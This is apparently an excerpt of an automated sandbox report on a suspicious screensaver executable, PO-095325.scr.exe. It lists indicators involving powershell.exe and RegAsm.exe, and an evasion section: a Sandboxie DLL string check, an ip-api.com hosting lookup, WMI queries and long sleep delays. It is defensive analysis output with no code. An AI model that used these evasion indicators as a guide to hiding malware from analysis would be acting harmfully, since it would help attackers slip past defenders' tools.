                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: Yara match File source: Process Memory Space: PO-095325.scr.exe PID: 4424, type: MEMORYSTR
                    Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: PO-095325.scr.exe, 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\PO-095325.scr.exe Memory allocated: C90000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\PO-095325.scr.exe Memory allocated: 28F0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\PO-095325.scr.exe Memory allocated: F10000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 15A0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 32B0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2FF0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\PO-095325.scr.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 599875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 599765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 599655
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 599547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 599437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 599325
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 599198
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 599094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 598984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 598875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 598765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 598656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 598547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 598437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 598328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 598216
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 598108
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 598000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 597890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 597781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 597672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 597559
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 597453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 597344
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 597234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 597125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 597015
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 596905
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 596797
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 596687
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 596578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 596468
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 596359
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 596250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 596140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 596031
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595921
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595812
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595703
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595593
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595469
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595359
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595031
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 594921
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 594783
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 594656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 594547
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6170
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3380
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 2188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 7666
                    Source: C:\Users\user\Desktop\PO-095325.scr.exe TID: 1684 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6508 Thread sleep count: 6170 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6508 Thread sleep count: 3380 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4984Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep count: 34 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2956Thread sleep count: 2188 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2956Thread sleep count: 7666 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -599765s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -599655s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -599547s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -599437s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -599325s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -599198s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -599094s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -598984s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -598875s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -598765s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -598656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -598547s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -598437s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -598328s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -598216s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -598108s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -598000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -597890s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -597781s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -597672s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -597559s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -597453s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -597344s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -597234s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -597125s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -597015s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -596905s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -596797s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -596687s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -596578s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -596468s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -596359s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -596250s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -596140s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -596031s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -595921s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -595812s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -595703s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -595593s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -595469s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -595359s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -595250s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -595140s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -595031s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -594921s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -594783s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -594656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -594547s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 3452Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 3452Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
